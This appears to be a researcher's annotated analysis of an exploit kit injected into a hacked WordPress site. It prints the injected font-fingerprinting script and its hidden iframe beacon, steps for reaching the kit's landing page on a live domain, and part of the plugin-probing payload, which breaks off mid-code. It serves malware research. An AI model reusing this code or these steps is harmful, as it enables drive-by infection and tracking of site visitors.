    s.innerHTML = testString;
    var defaultWidth = {};
    var defaultHeight = {};
    for (var index in baseFonts) {
        s.style.fontFamily = baseFonts[index] + ",'3x3'";
        h.appendChild(s);
        defaultWidth[baseFonts[index]] = s.offsetWidth;
        defaultHeight[baseFonts[index]] = s.offsetHeight;
        h.removeChild(s);
    }

    function detect(font) {
        var detected = false;
        for (var index in baseFonts) {
            s.style.fontFamily = ("'" + font + "'," + baseFonts[index]);
            h.appendChild(s);
            var matched = (s.offsetWidth != defaultWidth[baseFonts[index]] || s.offsetHeight != defaultHeight[baseFonts[index]]);
            h.removeChild(s);
            detected = detected || matched;
        }
        return detected;
    }

    this.detect = detect;
};

function getFonts() {
    var nFonts = document.getElementById("dlgHelper"),
            sHasFonts = "", numFonts = 0;

    if (typeof(nFonts.fonts) != 'object') {

        var checkFonts = ['3x3', '8514oem', 'AMS Euler', 'Abracadabra', 'Ad Lib', 'Adobe Jenson', 'Adobe Minion Cyrillic', 'Adobe Poetica', 'Adobe Text', 'Agency FB', 'Aharoni', 'Aisha', 'Akzidenz Grotesk', 'Albertus', 'Aldhabi', 'Aldus', 'Alexandria', 'Algerian', 'Allegro', 'Alpha Geometrique', 'Alphabetum', 'Amazone', 'American Text', 'American Typewriter', 'Amienne', 'Andalus', 'Andreas', 'Angsana New', 'AngsanaUPC', 'Anonymous', 'Anonymous Pro', 'Antiqua', 'Aparajita', 'Apex', 'Apple Chancery', 'Aptifer', 'Aquiline', 'Arabic Typesetting', 'Archer', 'Arial', 'Arial Black', 'Arial Hebrew', 'Arial Monospaced', 'Arial Narrow', 'Arial Rounded MT Bold', 'Arial Unicode MS', 'Aristocrat', 'Arno', 'Arnold Bﾃｶcklin', 'Arnprior', 'Ashley Inline', 'Ashley Script', 'Aster', 'Astur', 'Athens', 'Attika', 'Aurora', 'Avant Garde Gothic', 'Avenir', 'Bagel', 'Balloon Pop Outlaw Black', 'Banco', 'Bank Gothic', 'Barmeno', 'Baskerville', 'Baskerville Old Face', 'Bastion', 'Batak Script', 'Batang', 'BatangChe', 'Bauer Bodoni', 'Bauhaus', 'Bauhaus 93', 'Baveuse', 'Beat', 'Bell', 'Bell Centennial', 'Bell Gothic', 'Bell MT', 'Bella Donna', 'Bembo', 'Bembo Schoolbook', 'Benguiat', 'Benguiat Gothic', 'Berkeley Old Style', 'Berlin Sans', 'Berlin Sans FB', 'Berlin Sans FB Demi', 'Bernard MT Condensed', 'Bernhard Modern', 'Berylium', 'Beteckna', 'Bickley Script', 'Biondi', 'Bitstream Cyberbit', 'Bitstream Vera', 'Blackadder ITC', 'Blue Highway', 'Blue Highway Condensed', 'Blue Highway D Type', 'Blue Highway Linocut', 'Bodoni', 'Bodoni MT', 'Bodoni MT Black', 'Bodoni MT Condensed', 'Bodoni MT Poster Compressed', 'Book Antiqua', 'Bookman', 'Bookman Old Style', 'Bookshelf Symbol 7', 'Boopee', 'Bordeaux Roman', 'Bradley Hand ITC', 'Braggadocio', 'Braille', 'Brandon Grotesque', 'Britannic Bold', 'Broadway', 'Browallia New', 'BrowalliaUPC', 'Brush Script', 'Brush Script MT', 'Burnstown Dam', 'Byington', 'CJK glyphs', 'Cabin', 'Cafeteria', 'Caflisch Script', 'Calibri', 'Calibri Light', 'Californian FB', 'Calisto', 'Calisto MT', 'Cambria', 'Cambria Math', 'Candara', 'Capitals', 'Carbon Block', 'Cartier', 'Caslon', 'Caslon Antique', 'Castellar', 'CatholicSchoolGirls Intl BB', 'Catriel', 'Catull', 'Centaur', 'Century', 'Century Gothic', 'Century Old Style', 'Century Schoolbook', 'Century Schoolbook Infant', 'Chalkboard', 'Chandas', 'Chaparral', 'Charcoal', 'Charis SIL', 'Cheltenham', 'Chicago', 'Chiller', 'Choc', 'Cholla Slab', 'Cinderella', 'City', 'Civitype', 'Clarendon', 'Clearface', 'Clearface Gothic', 'ClearlyU', 'Clearview', 'Cloister Black', 'Co Headline', 'Co Text', 'Cochin', 'Code2000', 'Code2001', 'Code2002', 'Codex', 'Colonna', 'Colonna MT', 'Comic Sans', 'Comic Sans MS', 'Commercial Pi', 'Compacta', 'Computer Modern', 'Concrete Roman', 'Consolas', 'Constantia', 'Continuum Medium', 'Cooper Black', 'Copperplate Gothic Bold', 'Copperplate Gothic Light', 'Corbel', 'Cordia New', 'CordiaUPC', 'Corel', 'Corona', 'Corsiva', 'Cottonwood', 'Courier', 'Courier New', 'CourierHP', 'CourierPS', 'Credit Valley', 'Critter', 'Cupola', 'Curlz', 'Curlz MT', 'Cyberbit', 'Cyrillic', 'Cﾃｩzanne', 'DFKai-SB', 'DaunPenh', 'David', 'Dax', 'DecoType Naskh', 'DejaVu Sans', 'DejaVu Sans Mono', 'DejaVu Serif', 'DejaVu fonts', 'Denmark', 'DilleniaUPC', 'Divona', 'DokChampa', 'Dom Casual', 'Dotum', 'DotumChe', 'Doulos SIL', 'Dragonwick', 'Droid', 'Droid Sans Mono', 'Dyslexie', 'ER Architekt', 'ER Bukinist', 'ER Kurier', 'ER Univers', 'Earwig Factory', 'Ebrima', 'Ecofont', 'Ecotype', 'Edwardian Script', 'Edwardian Script ITC', 'Egyptienne', 'Elephant', 'Ellington', 'Engravers MT', 'Eras', 'Eras Bold ITC', 'Eras Demi ITC', 'Eras Light ITC', 'Eras Medium ITC', 'Erler Dingbats', 'Espy Sans', 'Espy Serif', 'Estrangelo Edessa', 'EucrosiaUPC', 'Euphemia', 'Euphorigenic S', 'Eurocrat', 'Eurostile', 'Everson Mono', 'Everson Mono Unicode', 'Ex Ponto', 'Exablock', 'Excelsior', 'Excelsior Cyrillic Upright', 'Exocet', 'FB Reactor', 'FF Meta', 'FF Scala', 'FF Scala Sans', 'FIG Script', 'Fairfield', 'FangSong', 'Fedra Mono', 'Felix Titling', 'Fifteenth Century', 'Fixed', 'Fixedsys', 'Fixedsys Excelsior', 'Flama', 'Fontcraft Courier', 'Fontoon', 'Footlight', 'Footlight MT Light', 'Formata', 'Forte', 'Fraktur', 'FrankRuehl', 'Franklin Gothic', 'Franklin Gothic Book', 'Franklin Gothic Demi', 'Franklin Gothic Demi Cond', 'Franklin Gothic Heavy', 'Franklin Gothic Medium', 'Franklin Gothic Medium Cond', 'Free UCS Outline Fonts', 'FreeSans', 'FreeSerif', 'FreesiaUPC', 'Freestyle Script', 'French Script', 'French Script MT', 'Friz Quadrata', 'Frutiger', 'Frutiger Next', 'Futo Min A101', 'Futura', 'GNU Unifont', 'Gabriola', 'Gadugi', 'Garamond', 'Gautami', 'Geneva', 'Gentium', 'Georgia', 'Georgia Ref', 'Gigi', 'Gill Sans', 'Gill Sans MT', 'Gill Sans MT Condensed', 'Gill Sans MT Ext Condensed Bold', 'Gill Sans Schoolbook', 'Gill Sans Ultra Bold', 'Gill Sans Ultra Bold Condensed', 'Gisha', 'Gloucester', 'Gloucester MT Extra Condensed', 'Gotham', 'Gothic font', 'Goudy', 'Goudy Old Style', 'Goudy Pro Font', 'Goudy Schoolbook', 'Goudy Stout', 'Goudy Text', 'Grad', 'Granjon', 'Grasset typeface', 'Guardian Egyptian', 'Gulim', 'GulimChe', 'Gungsuh', 'GungsuhChe', 'HM Phonetic', 'Haettenschweiler', 'Hanacaraka', 'Handel Gothic', 'Harlow Solid', 'Harlow Solid Italic', 'Harrington', 'Heather', 'Heavy Heap', 'Hei', 'Heisei Kaku Gothic W5', 'Helvetica', 'Helvetica Cyrillic', 'Helvetica Greek', 'Helvetica Neue', 'Hercules', 'High Tower Text', 'Highway Gothic', 'Hiroshige', 'Hiroshige Sans', 'Hobo', 'Hoefler Text', 'Horizon', 'Humana Serif', 'Hurry Up', 'Huxtable', 'HyperFont', 'ITC Avant Garde Gothic', 'ITC Stone Sans', 'ITC Stone Serif', 'Impact', 'Imprint', 'Imprint MT Shadow', 'Inconsolata', 'Industria', 'Informal Roman', 'Interstate', 'Ionic No. 5', 'IrisUPC', 'Irregularis', 'Iskoola Pota', 'Janson', 'Japanese Gothic', 'JasmineUPC', 'Jefferson', 'Jenson', 'Jim Crow', 'Joanna', 'Johnston', 'Jokerman', 'Jomolhari', 'Juice', 'Juice ITC', 'Junicode', 'Kabel', 'Kahana', 'Kai', 'KaiTi', 'Kalinga', 'Kartika', 'Khmer UI', 'Kochi', 'KodchiangUPC', 'Kokila', 'Korinna', 'Kredit', 'Kristen', 'Kristen ITC', 'Kuenstler Script', 'Kunstler Script', 'Kursivschrift', 'Kyokasho ICA', 'LED', 'Lao UI', 'LastResort', 'Latha', 'Lato', 'Leelawadee', 'Legacy Sans', 'Legacy Serif', 'Letter Gothic', 'Levenim MT', 'Lexia', 'Lexia Readable', 'Lexicon', 'Liberation Mono', 'Liberation Sans', 'Liberation Serif', 'Ligurino', 'Ligurino Condensed', 'LilyUPC', 'Linux Libertine', 'Literaturnaya', 'Lithos', 'Lo Cicero Cherokee', 'Lo-Type', 'Lontara Script', 'Lucida Blackletter', 'Lucida Bright', 'Lucida Calligraphy', 'Lucida Console', 'Lucida Fax', 'Lucida Grande', 'Lucida Handwriting', 'Lucida Math', 'Lucida Sans', 'Lucida Sans Typewriter', 'Lucida Sans Unicode', 'Lucida Typewriter', 'MICR', 'MS Arial', 'MS Courier New', 'MS Georgia', 'MS Gothic', 'MS Gothic, MS PGothic', 'MS Mincho', 'MS Mincho, MS PMincho', 'MS Outlook', 'MS PGothic', 'MS PMincho', 'MS Reference Sans Serif', 'MS Reference Specialty', 'MS Sans Serif', 'MS Serif', 'MS Tahoma', 'MS Trebuchet', 'MS UI Gothic', 'MS Verdana', 'MT Extra', 'MV Boli', 'Magneto', 'Magnificat', 'Maiandra GD', 'Maiola', 'Malgun Gothic', 'Mangal', 'Marlett', 'Mathematical Pi', 'Matura MT Script Capitals', 'Megadeth', 'Meiryo', 'Meiryo UI', 'Melior', 'Memphis', 'Menlo', 'Microgramma', 'Microsoft Himalaya', 'Microsoft JhengHei', 'Microsoft JhengHei UI', 'Microsoft New Tai Lue', 'Microsoft PhagsPa', 'Microsoft Sans Serif', 'Microsoft Tai Le', 'Microsoft Uighur', 'Microsoft YaHei', 'Microsoft YaHei UI', 'Microsoft Yi Baiti', 'Miller', 'Minchﾅ・, 'MingLiU', 'MingLiU, PMingLiU', 'MingLiU-ExtB', 'MingLiU-ExtB, PMingLiU-ExtB', 'MingLiU_HKSCS', 'MingLiU_HKSCS-ExtB', 'Minion', 'Minion Web', 'Minya Nouvelle', 'Miriam', 'Miriam Fixed', 'Mistral', 'Modern', 'Modern No. 20', 'Mona', 'Mona Lisa', 'Monaco', 'Mongolian Baiti', 'Monofur', 'Monospace', 'Monotype Albion 70', 'Monotype Corsiva', 'Monotype Gill Sans 571', 'Monotype Urdu 507', 'MoolBoran', 'Morse Code', 'Motorway', 'Mrs Eaves', 'Mufferaw', 'Museo Sans', 'Museo Slab', 'Myanmar Text', 'Myriad', 'NPS Rawlinson Roadway', 'NSimSun', 'Narkisim', 'Nassim', 'Nastaliq Navees', 'Neacademia', 'Neuland', 'Neuropol', 'Neutraface', 'Neuzeit S', 'New Century Schoolbook', 'New Gulim and Dotum', 'New Johnston', 'New Peninim', 'New York', 'News 701', 'News 702', 'News 705', 'News 706', 'News Gothic', 'Niagara Engraved', 'Niagara Solid', 'Nilland', 'Nimbus Mono L', 'Nimbus Roman', 'Nimbus Sans L', 'Nina', 'Nirmala UI', 'Nu Sans', 'Nyala', 'OCR A Extended', 'OCR-A', 'OCR-B', 'Old English Text', 'Old English Text MT', 'Onyx', 'OpenSymbol', 'Optima', 'Orator', 'Ormaxx', 'Osaka Monospaced', 'PMingLiU', 'PMingLiU-ExtB', 'PT Sans', 'Palace Script', 'Palace Script MT', 'Palatino', 'Palatino Linotype', 'Papyrus', 'Parchment', 'Parisine', 'Park Avenue', 'Peignot', 'Perpetua', 'Perpetua Greek', 'Perpetua Titling MT', 'Planet Benson 2', 'Plantagenet Cherokee', 'Plantin', 'Plantin Schoolbook', 'Playbill', 'Poor Richard', 'Portobello', 'PragmataPro', 'Prestige', 'Prestige Elite', 'Pricedown', 'Prima Sans', 'Pristina', 'ProFont', 'Proggy Programming Fonts', 'Pupcat', 'Pythagoras', 'Raanana', 'Raavi', 'Rage Italic', 'Rail Alphabet', 'Ravie', 'Rawlinson Roadway', 'Renault', 'Requiem', 'Revue', 'RichStyle', 'Rockwell', 'Rockwell Condensed', 'Rockwell Extra Bold', 'Rod', 'Roman', 'Rotis Sans', 'Rotis Semi Serif', 'Rotis Serif', 'Rufscript', 'Ryumin Light-KL', 'STIX', 'Sabon', 'Sakkal Majalla', 'San Francisco', 'Sanvito', 'Scala', 'Scala Sans', 'Scribble', 'Script', 'Script MT Bold', 'Scriptina', 'Seagull', 'Segoe Print', 'Segoe Script', 'Segoe UI', 'Segoe UI Light', 'Segoe UI Semibold', 'Segoe UI Symbol', 'Segoe UI v5.00', 'Segoe UI v5.00 (top) and v5.27 (bottom)', 'Segoe UI v5.01', 'Segoe UI v5.27', 'Shelley Volante', 'Shin Go', 'Shonar Bangla', 'Showcard Gothic', 'Shruti', 'SimHei', 'SimKai', 'SimSun', 'SimSun-ExtB', 'Simplified Arabic', 'Simplified Arabic Fixed', 'Sistina', 'Skeleton Antique', 'Skia', 'Skolar', 'Skolar Devanagari', 'Small Fonts', 'Snap', 'Snap ITC', 'Snell Roundhand', 'Soupbone', 'Souvenir', 'Souvenir Gothic', 'Square 721', 'Stencil', 'Stereofidelic', 'Stone Informal', 'Stone Sans', 'Stone Serif', 'Studz', 'Sundanese Unicode', 'Sutturah', 'Swiss 721', 'Sybil Green', 'Sydnie', 'Sylfaen', 'Symbol', 'SymbolPS', 'Symbola', 'Syntax', 'System', 'Tahoma', 'Tai Le Valentinium', 'Talmud', 'Tandelle', 'Teen', 'Teen Light', 'TektonAlecko', 'Tema Cantante', 'Tema CantanteAndale Mono', 'Tempus Sans', 'Tempus Sans ITC', 'Tengwar', 'Terminal', 'Terminus', 'Tex Gyre Cursor', 'Tibetan Machine Uni', 'Times', 'Times New Roman', 'Tiresias', 'Titus Cyberbit Basic', 'TowerAbadi', 'Trade Gothic', 'Traditional Arabic', 'Trajan', 'Transport', 'Trebuchet', 'Trebuchet MS', 'Trinitﾃｩ', 'Trump Gothic', 'Trump Mediaeval', 'Tunga', 'Tw Cen', 'Tw Cen MT', 'Tw Cen MT Condensed', 'Tw Cen MT Condensed Extra Bold', 'Twentieth Century', 'Typiko New Era', 'UM Typewriter', 'URW++ Nimbus Sans Global', 'Ubuntu', 'Ubuntu Mono', 'Umbra', 'Unicode fallback font', 'Univers', 'Urdu Typesetting', 'Utopia', 'Utsaah', 'Vale Type', 'Vani', 'Velvenda Cooler', 'Vera Sans', 'Vera Sans Mono', 'Vera Serif', 'Verdana', 'Verdana Ref', 'Versailles', 'Vijaya', 'Viner Hand ITC', 'VirtueAmsterdam Old Style', 'Vivaldi', 'Vladimir Script', 'Vrinda', 'Wadalab', 'Waker', 'Wanted', 'Webdings', 'Wedding TextAegyptus', 'Weiss', 'Westminster', 'Wickenden Cafe NDP', 'Wide Latin', 'William MonospaceBalloon', 'Willow', 'Windsor', 'Wingdings', 'Wingdings 2', 'Wingdings 3', 'Wyld', 'XITS', 'XITSAlexandria', 'Y.OzFontN', 'Zapf Chancery', 'Zapf Dingbats', 'Zapf-Chancery', 'Zapfino', 'Zurich'],
                baseFonts = ['monospace', 'sans-serif', 'serif'];

        var out = "", det = new Detector();
        for (var i in checkFonts) {
            if (det.detect(checkFonts[i])) {
                sHasFonts += checkFonts[i];
                numFonts++;
            }
        }
    }
    else {
        var nFontLen = nFonts.fonts.count;
        for (i = 1; i < nFontLen + 1; i++) {
            sHasFonts += nFonts.fonts(i);
            numFonts++;
        }
    }

    //return numFonts + ":" + md5(sHasFonts);
    var nIF = document.createElement("iframe");
    nIF.width = 1;
    nIF.height = 1;
    nIF.style.visibility = 'hidden';
    nIF.src = "/wp-includes/pomo/dtsrc.php?a=h1&f=" + md5(sHasFonts) + (typeof encodeURIComponent != 'undefined' ? "&u=" + encodeURIComponent(window.navigator['userAgent']) : (typeof escape != 'undefined' ? "&u=" + escape(window.navigator['userAgent']) : window.navigator['userAgent'].replace(/(\t|\n|&|\?|)/g, " ") ));
    document.getElementsByTagName("body")[0].appendChild(nIF);
}

if (typeof(window.addEventListener) == 'undefined') {
    window.onload = getFonts;
} else {
    window.addEventListener("load", getFonts);
}

</script>
</head>
<body>
<OBJECT id="dlgHelper" CLASSID="clsid:3050f819-98b5-11cf-bb82-00aa00bdce0b" width="0px" height="0px"></OBJECT>
</body>
</html>


// unixfreaxjp:
// skipped the exploit part, and 
// see the below payload link to get the landing page....
//

    nIF.src = "/wp-includes/pomo/dtsrc.php?a=h1&f=" 
              + md5(sHasFonts) 
              + (typeof encodeURIComponent != 'undefined' ? "&u=" + encodeURIComponent(window.navigator['userAgent']) : (typeof escape != 'undefined' ? "&u=" + escape(window.navigator['userAgent']) : window.navigator['userAgent'].replace(/(\t|\n|&|\?|)/g, " ") ));

// unixfreaxjp:
// forming conditions:
// pick any flavor of font provided and fire it up w/MD5

$ echo Hercules|md5
51d0f9f5d6d2c5ff3ade4b38bb7c1ceb

// unixfreaxjp:
// more conditions (pickone)

(typeof encodeURIComponent != 'undefined' ? "&u=" + encodeURIComponent(window.navigator['userAgent']) : 
(typeof escape             != 'undefined' ? "&u=" + escape(window.navigator['userAgent']) :

// unixfreaxjp:
// And do ---> .replace(/(\t|\n|&|\?|)/g, " ") in the end. (replace strange chars wif space.. mostly unnecessary..)

// unixfreaxjp:
// assembled it, the result must've been a long dull URL 
// this E Kit is expected

h00p://mahsms.ir/wp-includes/pomo/dtsrc.php?a=h1&f=51d0f9f5d6d2c5ff3ade4b38bb7c1ceb&u=Mozilla%2F5.0%20(Windows%3B%20U%3B%20MSIE%207.0%3B%20Windows%20NT%205.2)%20Java%2F1.5.0_08 


// Bingo.. Got the landing page! 

---request begin---
GET /wp-includes/pomo/dtsrc.php?a=h1&f=51d0f9f5d6d2c5ff3ade4b38bb7c1ceb&u=Mozilla%2F5.0%20(Windows%3B%20U%3B%20MSIE%207.0%3B%20Windows%20NT%205.2)%20Java%2F1.5.0_08 HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 5.2) Java/1.5.0_08
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Host: mahsms.ir
Connection: Keep-Alive
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
HTTP request sent, awaiting response...

---response begin---
HTTP/1.1 200 OK
Content-Encoding: gzip
Vary: Accept-Encoding
Date: Tue, 11 Mar 2014 02:08:04 GMT
Server: LiteSpeed
Connection: close
X-Powered-By: PHP/5.2.17
Content-Type: text/html

// unixfreaxjp:
// yes we got it; but remember, you get it only ONE TIME.. you may fail..change IP!!
// remember to trail your reff

-rwxr--r--  1 14535 Mar 11 11:07 payload.gz*

$ cp payload.gz payload-bak.gz 
$ gunzip payload.gz

// unixfreaxjp:
// HELLO PLUGIN DETECT! LONG TIME NO SEE! YOU GREW TALLER (IN VER)! :-)

$ cat payload
<html><head></head><body><script type='text/javascript'>/*PluginDetect v0.8.3www.pinlady.net/PluginDetect/license/[ getVersion hasMimeType onDetectionDone ][ Java AdobeReader ]*/var PluginDetect={version:"0.8.3",name:"PluginDetect",openTag:"<",isDefined:function(b){return typeof b!="undefined"},isArray:function(b){return(/array/i).test(Object.prototype.toString.call(b))},isFunc:function(b){return typeof b=="function"},isString:function(b){return typeof b=="string"},isNum:function(b){return typeof b=="number"},isStrNum:function(b){return(typeof b=="string"&&(/\d/).test(b))},getNumRegx:/[\d][\d\.\_,\-]*/,splitNumRegx:/[\.\_,\-]/g,getNum:function(b,c){var d=this,a=d.isStrNum(b)?(d.isDefined(c)?new RegExp(c):d.getNumRegx).exec(b):null;return a?a[0]:null},compareNums:function(h,f,d){var e=this,c,b,a,g=parseInt;if(e.isStrNum(h)&&e.isStrNum(f)){if(e.isDefined(d)&&d.compareNums){return d.compareNums(h,f)}c=h.split(e.splitNumRegx);b=f.split(e.splitNumRegx);for(a=0;a<Math.min(c.length,b.length);a++){if(g(c[a],10)>g(b[a],10)){return 1}if(g(c[a],10)<g(b[a],10)){return -1}}}return 0},formatNum:function(b,c){var d=this,a,e;if(!d.isStrNum(b)){return null}if(!d.isNum(c)){c=4}c--;e=b.replace(/\s/g,"").split(d.splitNumRegx).concat(["0","0","0","0"]);for(a=0;a<4;a++){if(/^(0+)(.+)$/.test(e[a])){e[a]=RegExp.$2}if(a>c||!(/\d/).test(e[a])){e[a]="0"}}return e.slice(0,4).join(",")},getPROP:function(d,b,a){var c;try{if(d){a=d[b]}}catch(c){}return a},findNavPlugin:function(l,e,c){var j=this,h=new RegExp(l,"i"),d=(!j.isDefined(e)||e)?/\d/:0,k=c?new RegExp(c,"i"):0,a=navigator.plugins,g="",f,b,m;for(f=0;f<a.length;f++){m=a[f].description||g;b=a[f].name||g;if((h.test(m)&&(!d||d.test(RegExp.leftContext+RegExp.rightContext)))||(h.test(b)&&(!d||d.test(RegExp.leftContext+RegExp.rightContext)))){if(!k||!(k.test(m)||k.test(b))){return a[f]}}}return null},getMimeEnabledPlugin:function(k,m,c){var e=this,f,b=new RegExp(m,"i"),h="",g=c?new RegExp(c,"i"):0,a,l,d,j=e.isString(k)?[k]:k;for(d=0;d<j.length;d++){if((f=e.hasMimeType(j[d]))&&(f=f.enabledPlugin)){l=f.description||h;a=f.name||h;if(b.test(l)||b.test(a)){if(!g||!(g.test(l)||g.test(a))){return f}}}}return 0},getVersionDelimiter:",",findPlugin:function(d){var c=this,b,d,a={status:-3,plugin:0};if(c.DOM){c.DOM.initDiv()}if(!c.isString(d)){return a}if(d.length==1){c.getVersionDelimiter=d;return a}d=d.toLowerCase().replace(/\s/g,"");b=c.Plugins[d];if(!b||!b.getVersion){return a}a.plugin=b;a.status=1;return a},getPluginFileVersion:function(f,b){var h=this,e,d,g,a,c=-1;if(h.OS>2||!f||!f.version||!(e=h.getNum(f.version))){return b}if(!b){return e}e=h.formatNum(e);b=h.formatNum(b);d=b.split(h.splitNumRegx);g=e.split(h.splitNumRegx);for(a=0;a<d.length;a++){if(c>-1&&a>c&&d[a]!="0"){return b}if(g[a]!=d[a]){if(c==-1){c=a}if(d[a]!="0"){return b}}}return e},AXO:window.ActiveXObject,getAXO:function(a){var d=null,c,b=this;try{d=new b.AXO(a)}catch(c){};return d},INIT:function(){this.init.library(this)},init:{$:1,hasRun:0,objProperties:function(d,e,b){var a,c={};if(e&&b){if(e[b[0]]===1&&!d.isArray(e)&&!d.isFunc(e)&&!d.isString(e)&&!d.isNum(e)){for(a=0;a<b.length;a=a+2){e[b[a]]=b[a+1];c[b[a]]=1}}for(a in e){if(!c[a]&&e[a]&&e[a][b[0]]===1){this.objProperties(d,e[a],b)}}}},publicMethods:function(c,f){var g=this,b=g.$,a,d;if(c&&f){for(a in c){try{if(b.isFunc(c[a])){f[a]=c[a](f)}}catch(d){}}}},plugin:function(a,c){var d=this,b=d.$;if(a){d.objProperties(b,a,["$",b,"$$",a]);if(!b.isDefined(a.getVersionDone)){a.installed=null;a.version=null;a.version0=null;a.getVersionDone=null;a.pluginName=c}}},detectIE:function(){var init=this,$=init.$,doc=document,e,x,userAgent=navigator.userAgent||"",progid,progid1,progid2;$.isIE=eval("/*@cc_on!@*/!1");$.verIE=$.isIE?((/^(?:.*?[^a-zA-Z])??(?:MSIE|IE)\s*(\d+\.?\d*)/i).test(userAgent)?parseFloat(RegExp.$1,10):7):null;$.ActiveXEnabled=!1;$.ActiveXFilteringEnabled=!1;if($.isIE){try{$.ActiveXFilteringEnabled=window.external.msActiveXFilteringEnabled()}catch(e){}progid1=["Msxml2.XMLHTTP","Msxml2.DOMDocument","Microsoft.XMLDOM","TDCCtl.TDCCtl","Shell.UIHelper","HtmlDlgSafeHelper.HtmlDlgSafeHelper","Scripting.Dictionary"];progid2=["WMPlayer.OCX","ShockwaveFlash.ShockwaveFlash","AgControl.AgControl",];progid=progid1.concat(progid2);for(x=0;x<progid.length;x++){if($.getAXO(progid[x])){$.ActiveXEnabled=!0;if(!$.dbug){break}}}if($.ActiveXEnabled&&$.ActiveXFilteringEnabled){for(x=0;x<progid2.length;x++){if($.getAXO(progid2[x])){$.ActiveXFilteringEnabled=!1;break}}}}},detectNonIE:function(){var e=this,c=this.$,d=navigator,b=c.isIE?"":d.userAgent||"",f=d.vendor||"",a=d.product||"";c.isGecko=(/Gecko/i).test(a)&&(/Gecko\s*\/\s*\d/i).test(b);c.verGecko=c.isGecko?c.formatNum((/rv\s*\:\s*([\.\,\d]+)/i).test(b)?RegExp.$1:"0.9"):null;c.isChrome=(/(Chrome|CriOS)\s*\/\s*(\d[\d\.]*)/i).test(b);c.verChrome=c.isChrome?c.formatNum(RegExp.$2):null;c.isSafari=!c.isChrome&&((/Apple/i).test(f)||!f)&&(/Safari\s*\/\s*(\d[\d\.]*)/i).test(b);c.verSafari=c.isSafari&&(/Version\s*\/\s*(\d[\d\.]*)/i).test(b)?c.formatNum(RegExp.$1):null;c.isOpera=(/Opera\s*[\/]?\s*(\d+\.?\d*)/i).test(b);c.verOpera=c.isOpera&&((/Version\s*\/\s*(\d+\.?\d*)/i).test(b)||1)?parseFloat(RegExp.$1,10):null},detectPlatform:function(){var e=this,d=e.$,b,a=navigator.platform||"";d.OS=100;if(a){var c=["Win",1,"Mac",2,"Linux",3,"FreeBSD",4,"iPhone",21.1,"iPod",21.2,"iPad",21.3,"Win.*CE",22.1,"Win.*Mobile",22.2,"Pocket\\s*PC",22.3,"",100];for(b=c.length-2;b>=0;b=b-2){if(c[b]&&new RegExp(c[b],"i").test(a)){d.OS=c[b+1];break}}}},library:function(c){var e=this,d=document,b,a;c.init.objProperties(c,c,["$",c]);for(a in c.Plugins){c.init.plugin(c.Plugins[a],a)}e.publicMethods(c.PUBLIC,c);c.win.init();c.head=d.getElementsByTagName("head")[0]||d.getElementsByTagName("body")[0]||d.body||null;e.detectPlatform();e.detectIE();e.detectNonIE();c.init.hasRun=1}},ev:{$:1,handler:function(c,b,a){return function(){c(b,a)}},fPush:function(b,a){var c=this,d=c.$;if(d.isArray(a)&&(d.isFunc(b)||(d.isArray(b)&&b.length>0&&d.isFunc(b[0])))){a.push(b)}},callArray:function(a){var b=this,d=b.$,c;if(d.isArray(a)){while(a.length){c=a[0];a.splice(0,1);b.call(c)}}},call:function(d){var b=this,c=b.$,a=c.isArray(d)?d.length:-1;if(a>0&&c.isFunc(d[0])){d[0](c,a>1?d[1]:0,a>2?d[2]:0,a>3?d[3]:0)}else{if(c.isFunc(d)){d(c)}}}},PUBLIC:{getVersion:function(b){var a=function(h,e,d){var f=b.findPlugin(h),g,c;if(f.status<0){return null};g=f.plugin;if(g.getVersionDone!=1){g.getVersion(null,e,d);if(g.getVersionDone===null){g.getVersionDone=1}}c=(g.version||g.version0);c=c?c.replace(b.splitNumRegx,b.getVersionDelimiter):c;return c};return a},onDetectionDone:function(b){var a=function(j,h,d,c){var e=b.findPlugin(j),k,g;if(e.status==-3){return -1}g=e.plugin;if(!b.isArray(g.funcs)){g.funcs=[]};if(g.getVersionDone!=1){k=b.getVersion?b.getVersion(j,d,c):b.isMinVersion(j,"0",d,c)}if(g.installed!=-0.5&&g.installed!=0.5){b.ev.call(h);return 1}b.ev.fPush(h,g.funcs);return 0};return a},hasMimeType:function(b){var a=function(d){if(!b.isIE&&d&&navigator&&navigator.mimeTypes){var g,f,c,e=b.isArray(d)?d:(b.isString(d)?[d]:[]);for(c=0;c<e.length;c++){if(b.isString(e[c])&&/[^\s]/.test(e[c])){g=navigator.mimeTypes[e[c]];f=g?g.enabledPlugin:0;if(f&&(f.name||f.description)){return g}}}}return null};return a},z:0},codebase:{$:1,isDisabled:function(){var a=this,b=a.$;return b.ActiveXEnabled&&b.isIE&&b.verIE>=7?0:1},checkGarbage:function(d){var b=this,c=b.$,a;if(c.isIE&&d&&c.getPROP(d.firstChild,"object")){a=c.getPROP(d.firstChild,"readyState");if(c.isNum(a)&&a!=4){b.garbage=1;return 1}}return 0},emptyGarbage:function(){var a=this,b=a.$,c;if(b.isIE&&a.garbage){try{window.CollectGarbage()}catch(c){}a.garbage=0}},init:function(e){if(!e.init){var c=this,d=c.$,a,b;e.init=1;e.min=0;e.max=0;e.hasRun=0;e.version=null;e.L=0;e.altHTML="";e.span=document.createElement("span");e.tagA='<object width="1" height="1" style="display:none;" codebase="#version=';b=e.classID||e.$$.classID||"";e.tagB='" '+((/clsid\s*:/i).test(b)?'classid="':'type="')+b+'">'+e.altHTML+d.openTag+"/object>";for(a=0;a<e.Lower.length;a++){e.Lower[a]=d.formatNum(e.Lower[a]);e.Upper[a]=d.formatNum(e.Upper[a])}}},isActiveXObject:function(i,b){var f=this,g=f.$,a=0,h,d=i.$$,c=i.span;if(i.min&&g.compareNums(b,i.min)<=0){return 1}if(i.max&&g.compareNums(b,i.max)>=0){return 0}c.innerHTML=i.tagA+b+i.tagB;if(g.getPROP(c.firstChild,"object")){a=1};f.checkGarbage(c);c.innerHTML="";if(a){i.min=b}else{i.max=b}return a},convert_:function(f,a,b,e){var d=f.convert[a],c=f.$;return d?(c.isFunc(d)?c.formatNum(d(b.split(c.splitNumRegx),e).join(",")):b):d},convert:function(h,c,g){var 